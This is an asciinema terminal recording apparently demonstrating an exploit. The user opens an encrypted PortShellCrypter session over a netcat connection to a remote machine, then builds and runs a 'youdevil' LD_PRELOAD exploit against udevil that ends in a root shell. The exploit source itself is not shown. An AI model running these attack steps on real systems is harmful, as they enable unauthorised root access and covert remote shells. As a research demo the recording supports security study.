{"version": 2, "width": 94, "height": 29, "timestamp": 1711710103, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}
[0.002334, "o", "\u001b[?2004hnouser@localhorst:~$ "]
[1.05703, "o", "\r\n\u001b[?2004l\r"]
[1.057121, "o", "\u001b[?2004hnouser@localhorst:~$ "]
[3.257021, "o", "/"]
[3.513072, "o", "t"]
[3.608975, "o", "m"]
[3.825134, "o", "p/"]
[4.112988, "o", "p"]
[4.208997, "o", "s"]
[4.37699, "o", "c"]
[4.456992, "o", "l"]
[5.88097, "o", "\r\n\u001b[?2004l\r"]
[5.884409, "o", "\r\nPortShellCrypter [pscl] v0.68 (C) 2006-2023 stealth -- github.com/stealth/psc\r\n\r\n\r\npscl: Waiting for [pscr] session to appear ...\r\n"]
[5.887977, "o", "\u001b[?2004hnouser@localhorst:~$ "]
[6.881283, "o", "\r\n\u001b[?2004l\r\u001b[?2004hnouser@localhorst:~$ "]
[7.545407, "o", "n"]
[7.625441, "o", "c"]
[7.841431, "o", " "]
[8.105372, "o", "1"]
[8.193403, "o", "9"]
[8.337144, "o", "2"]
[8.457351, "o", "."]
[8.865369, "o", "1"]
[9.281263, "o", "6"]
[9.513372, "o", "8"]
[9.865367, "o", "."]
[9.98535, "o", "0"]
[10.113311, "o", "."]
[10.841436, "o", "2"]
[11.049346, "o", "0"]
[11.313336, "o", "8"]
[11.449396, "o", " "]
[11.697344, "o", "2"]
[11.865426, "o", "2"]
[12.049314, "o", "2"]
[12.217327, "o", "2"]
[13.065215, "o", "\r\n\u001b[?2004l\r"]
[14.521174, "o", "i"]
[14.657181, "o", "d"]
[15.233144, "o", "\r\n"]
[15.237781, "o", "uid=1001(stealth) gid=1001(stealth) groups=1001(stealth),100(users)\r\n"]
[16.489235, "o", "."]
[16.817235, "o", "/"]
[17.18523, "o", "p"]
[17.289328, "o", "s"]
[17.489053, "o", "c"]
[17.697188, "o", "r"]
[18.249254, "o", "\r\n"]
[18.254012, "o", "\r\nPortShellCrypter [pscr] v0.68 (C) 2006-2023 stealth -- github.com/stealth/psc\r\n\r\n"]
[18.254954, "o", "\r\npscl: Seen STARTTLS sequence, enabling crypto.\r\n"]
[18.273683, "o", "\u001b[?2004h\u001b]0;stealth@mx: ~\u0007\u001b[1;35mstealth\u001b[0m@\u001b[1;36mmx\u001b[0m:\u001b[1;32m~\u001b[0m\r\r\n\u001b[1;32m$\u001b[0m "]
[19.12348, "o", "\r\n\u001b[?2004l\r"]
[19.12432, "o", "\u001b[?2004h\u001b]0;stealth@mx: ~\u0007\u001b[1;35mstealth\u001b[0m@\u001b[1;36mmx\u001b[0m:\u001b[1;32m~\u001b[0m\r\r\n\u001b[1;32m$\u001b[0m "]
[19.899426, "o", "l"]
[19.971503, "o", "s"]
[20.0512, "o", " "]
[20.139299, "o", "-"]
[20.339423, "o", "l"]
[20.370677, "o", "a"]
[20.443042, "o", " "]
[20.755149, "o", "/"]
[21.139227, "o", "m"]
[21.243378, "o", "e"]
[21.435294, "o", "d"]
[21.603421, "o", "i"]
[21.731061, "o", "a"]
[22.315033, "o", "\r\n\u001b[?2004l\r"]
[22.318867, "o", "total 8\r\n"]
[22.319531, "o", "drwxr-xr-x  2 root root 4096 Mar 29 11:55 \u001b[0m\u001b[01;34m.\u001b[0m\r\ndrwxr-xr-x 19 root root 4096 Mar 29 10:02 \u001b[01;34m..\u001b[0m\r\n"]
[22.320156, "o", "\u001b[?2004h\u001b]0;stealth@mx: ~\u0007\u001b[1;35mstealth\u001b[0m@\u001b[1;36mmx\u001b[0m:\u001b[1;32m~\u001b[0m\r\r\n\u001b[1;32m$\u001b[0m "]
[25.354858, "o", "n"]
[25.795039, "o", "e"]
[26.059204, "o", "o"]
[26.219096, "o", "f"]
[26.378656, "o", "e"]
[26.643372, "o", "t"]
[26.747166, "o", "c"]
[26.890652, "o", "h"]
[27.73885, "o", " "]
[29.42673, "o", "|"]
[29.762802, "o", " "]
[30.074819, "o", "g"]
[30.939216, "o", "r"]
[31.01104, "o", "e"]
[31.227136, "o", "p"]
[31.579007, "o", " "]
[32.46706, "o", "-"]
[34.683079, "o", "v"]
[34.931036, "o", " "]
[35.138677, "o", "-"]
[35.499018, "o", "i"]
[35.602763, "o", " "]
[36.042948, "o", "q"]
[36.258827, "o", "e"]
[36.522786, "o", "m"]
[36.842813, "o", "u"]
[38.123538, "o", "\r\n\u001b[?2004l\r"]
[38.168175, "o", "\u001b[?25l\u001b[?7l\u001b[37m\u001b[0m\u001b[1m@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n@@@@@@@@@@@@%*+--:------=+*%@@@@@@@@@@@@\r\n@@@@@@@@@#=. .-+#%@@@@@%#*+--=#@@@@@@@@@\r\n@@@@@@@+. .=%@@@@@@@@@@@@@@@@*-:+@@@@@@@\r\n@@@@@*.  *@@@@@@@@@@@@@@@@@@@@@%-.*@@@@@\r\n@@@@-  -@@@@@@@@@@@@@@@@@@@@@@@#:  -@@@@\r\n@@@:  -@@@@@@@=.*@@@@@@@@@@@@%-   = :@@@\r\n@@=  .@@@@@@@@%- :%@@@@@@@@@+   -%@# =@@\r\n@%   +@@@@@@@@@@#. =@@@@@@*.  .*@@@@. %@\r\n@+   *@@@@@@*..*@@+  *@@%-   =@@@@@@- +@\r\n@=   *@@@@%-    -%@@- :=   -%@@@@@@@: +@\r\n@+   :@@@=        +@@=   .#@@@@@@@@%  *@\r\n@%    +*.          .:     *@@#: +@@:  @@\r\n@@+                   :%@- :-    ::  +@@\r\n@@@-                  .=@@=         -@@@\r\n@@+.                     .           +@@\r\n%=..:.................::...........:..-%\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\u001b[0m\r\n"]
[38.17103, "o", "\u001b[18A\u001b[9999999D\u001b[43C\u001b[0m\u001b[1m\u001b[34m\u001b[1mstealth\u001b[0m@\u001b[34m\u001b[1mmx\u001b[0m \r\n"]
[38.171526, "o", "\u001b[43C\u001b[0m----------\u001b[0m \r\n"]
[38.17428, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mOS\u001b[0m\u001b[0m:\u001b[0m MX x86_64\u001b[0m \r\n"]
[38.180216, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mKernel\u001b[0m\u001b[0m:\u001b[0m 6.1.0-18-amd64\u001b[0m \r\n"]
[38.18327, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mUptime\u001b[0m\u001b[0m:\u001b[0m 11 mins\u001b[0m \r\n"]
[38.214698, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mPackages\u001b[0m\u001b[0m:\u001b[0m 2050 (dpkg)\u001b[0m \r\n"]
[38.217654, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mShell\u001b[0m\u001b[0m:\u001b[0m bash 5.2.15\u001b[0m \r\n"]
[38.223784, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mResolution\u001b[0m\u001b[0m:\u001b[0m 1024x768\u001b[0m \r\n"]
[38.313692, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mDE\u001b[0m\u001b[0m:\u001b[0m Xfce 4.18\u001b[0m \r\n"]
[38.316823, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mWM\u001b[0m\u001b[0m:\u001b[0m Xfwm4\u001b[0m \r\n"]
[38.32719, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mWM Theme\u001b[0m\u001b[0m:\u001b[0m mx-comfort\u001b[0m \r\n"]
[38.342545, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mTheme\u001b[0m\u001b[0m:\u001b[0m mx-comfort [GTK2], Adwaita [GTK3]\u001b[0m \r\n"]
[38.358109, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mIcons\u001b[0m\u001b[0m:\u001b[0m Papirus-mxblue-darkpanes [GTK2], Adwaita [GTK3]\u001b[0m \r\n"]
[38.366461, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mTerminal\u001b[0m\u001b[0m:\u001b[0m pscr\u001b[0m \r\n"]
[38.392694, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mGPU\u001b[0m\u001b[0m:\u001b[0m 00:02.0 Vendor 1234 Device 1111\u001b[0m \r\n"]
[38.396782, "o", "\u001b[43C\u001b[0m\u001b[36m\u001b[1mMemory\u001b[0m\u001b[0m:\u001b[0m 615MiB / 7940MiB\u001b[0m \r\n"]
[38.397325, "o", "\r\n\u001b[43C\u001b[30m\u001b[40m   \u001b[31m\u001b[41m   \u001b[32m\u001b[42m   \u001b[33m\u001b[43m   \u001b[34m\u001b[44m   \u001b[35m\u001b[45m   \u001b[36m\u001b[46m   \u001b[37m\u001b[47m   \u001b[m\r\n\u001b[43C\u001b[38;5;8m\u001b[48;5;8m   \u001b[38;5;9m\u001b[48;5;9m   \u001b[38;5;10m\u001b[48;5;10m   \u001b[38;5;11m\u001b[48;5;11m   \u001b[38;5;12m\u001b[48;5;12m   \u001b[38;5;13m\u001b[48;5;13m   \u001b[38;5;14m\u001b[48;5;14m   \u001b[38;5;15m\u001b[48;5;15m   \u001b[m\r\n\r\n\r\n"]
[38.398923, "o", "\u001b[?25h\u001b[?7h\r\n"]
[38.399504, "o", "\u001b[?2004h\u001b]0;stealth@mx: ~\u0007\u001b[1;35mstealth\u001b[0m@\u001b[1;36mmx\u001b[0m:\u001b[1;32m~\u001b[0m\r\r\n\u001b[1;32m$\u001b[0m "]
[43.627018, "o", "c"]
[43.69912, "o", "d"]
[43.882941, "o", " "]
[44.330586, "o", "y"]
[44.602811, "o", "o"]
[44.842781, "o", "u"]
[45.714769, "o", "d"]
[45.914748, "o", "e"]
[46.154837, "o", "v"]
[46.338771, "o", "i"]
[46.522913, "o", "l"]
[47.139333, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;stealth@mx: ~/youdevil\u0007\u001b[1;35mstealth\u001b[0m@\u001b[1;36mmx\u001b[0m:\u001b[1;32m~/youdevil\u001b[0m\r\r\n\u001b[1;32m$\u001b[0m "]
[49.995216, "o", "."]
[50.578885, "o", "/"]
[50.906823, "o", "y"]
[51.066881, "o", "o"]
[51.290952, "o", "u"]
[51.610795, "o", "d"]
[51.818834, "o", "e"]
[52.034851, "o", "v"]
[52.250757, "o", "i"]
[52.442863, "o", "l"]
[52.658944, "o", "."]
[52.746902, "o", "c"]
[54.251534, "o", "\r\n\u001b[?2004l\r"]
[54.255454, "o", "++ cc -fPIC -c -pedantic -Wall -std=c11 ./youdevil.c -o youdevil.o\r\n"]
[54.298064, "o", "++ cc -shared youdevil.o -o youdevil\r\n"]
[54.32936, "o", "++ YOUDEVIL=1\r\n++ LD_PRELOAD=./youdevil\r\n++ cat\r\n"]
[54.330159, "o", "\r\nproudly presented by ...\r\n\r\n ██████╗      ██╗    ███████╗██╗  ██╗██╗██╗     ██╗     ███████╗\r\n"]
[54.330732, "o", "██╔════╝      ╚██╗   ██╔════╝██║ ██╔╝██║██║     ██║     ██╔════╝\r\n██║      █████╗╚██╗  ███████╗█████╔╝ ██║██║     ██║     ███████╗\r\n██║      ╚════╝██╔╝  ╚════██║██╔═██╗ ██║██║     ██║     ╚════██║\r\n╚██████╗      ██╔╝   ███████║██║  ██╗██║███████╗███████╗███████║\r\n ╚═════╝      ╚═╝    ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚══════╝\r\n\r\n\r\n... ~> Shouts to nullsecurity and THC <~ ...\r\n\r\n\r\n!!! Disclaimer: For research purposes only !!!\r\n!!! Make sure to only run in safe testing environments !!!\r\n\r\n[!] Get the real deal at https://github.com/stealth/po"]
[54.330825, "o", "lyglots\r\n\r\n[*] Creating user-owned `/media/stealth` ...\r\n"]
[55.349474, "o", "udevil: warning 25: setfacl on /media/stealth failed, falling back to 'user:root rwx------'\r\n"]
[55.351777, "o", "Mounted ramfs at /media/stealth/ramfs\r\n"]
[58.352953, "o", "[+] success!\r\n[*] Umounting ...\r\n"]
[58.373476, "o", "[*] Entering executor-loop. Not using inotify so this can take some minutes ...\r\n"]
[92.858101, "o", "[?] Boomsh! euid=0\r\n"]
[92.868965, "o", "\u001b[01;31mroot@mx\u001b[00m:\u001b[01;34m/media/stealth\u001b[00m# "]
[94.963096, "o", "i"]
[95.107097, "o", "d"]
[95.93119, "o", "\r\n"]
[95.934519, "o", "uid=0(root) gid=0(root) groups=0(root),100(users),1001(stealth)\r\n"]
[95.935402, "o", "\u001b[01;31mroot@mx\u001b[00m:\u001b[01;34m/media/stealth\u001b[00m#                                                                                                                                                                                                                       \r\u001b[01;31mroot@mx\u001b[00m:\u001b[01;34m/media/stealth\u001b[00m# "]
